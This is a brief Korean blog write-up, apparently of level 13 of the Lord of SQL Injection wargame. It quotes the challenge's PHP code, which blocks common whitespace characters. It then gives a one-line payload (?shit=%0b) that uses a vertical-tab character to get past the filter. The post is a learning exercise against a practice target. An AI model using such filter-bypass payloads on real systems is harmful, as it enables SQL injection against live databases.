본문 바로가기
웹 해킹/lord of SQL

los 13번

by sonysame 2018. 6. 28. 
1) exit("No Hack ~_~"); 
  if(preg_match('/ |\n|\r|\t/i', $_GET[shit])) exit("HeHe"); 
  $query = "select 1234 from{$_GET[shit]}prob_giant where 1"; 
  echo "
query : {$query}

"; 
  $result = @mysql_fetch_array(mysql_query($query)); 
  if($result[1234]) solve("giant"); 
  highlight_file(__FILE__); 
?>

공백 우회 방법

%0a %0d %09 이외에도

%0b %0c 가 있다.


?shit=%0b


저작자표시

'웹 해킹 > lord of SQL' 카테고리의 다른 글

los 15번  (0) 2018.06.29
los 14번  (0) 2018.06.28
los 12번  (0) 2018.06.28
los 11번  (0) 2018.06.28
los 10번  (0) 2018.06.28

관련글

티스토리툴바